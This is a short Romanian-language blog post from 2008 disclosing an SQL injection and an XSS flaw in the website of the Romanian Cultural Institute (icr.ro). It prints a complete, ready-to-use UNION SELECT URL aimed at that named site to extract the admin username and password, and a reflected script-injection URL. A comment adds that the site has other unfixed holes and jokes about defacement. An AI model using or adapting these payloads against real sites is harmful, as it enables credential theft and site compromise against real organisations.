Loading....
Loading....

    Posted by 2fingers in English News

    Posted on November 18th, 2008

    O alta vulnerabilitate de tip sql injection ne-a fost raportata de unu_1234567. De aceasta data site-ul afectat este http://icr.ro, userul si parola de admin putand fii aflate extrem de simplu.

    Sintaxa: http://www.icr.ro/comunicate.php?cod=123459999%20union%20all%20select%201,2,concat(user,0x3a,password),4,5,6%20from%20dny_users%20limit%200,1–

    Screenshot:

    Free Image Hosting at www.ImageShack.us

    Si xss: http://www.icr.ro/comunicate.php?cod=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

    Related Posts

    One Response to “SQL Injecton in Institutul Cultural Roman (icr.ro)”

    1. m4nt13 Says:

      si nu sunt singurele probleme pe care le au. din pacate nici nu le repara, ceea ce inseamna ca e posibil sa vedem vreo imagine porno cand accesam site-ul :)

    Leave a Reply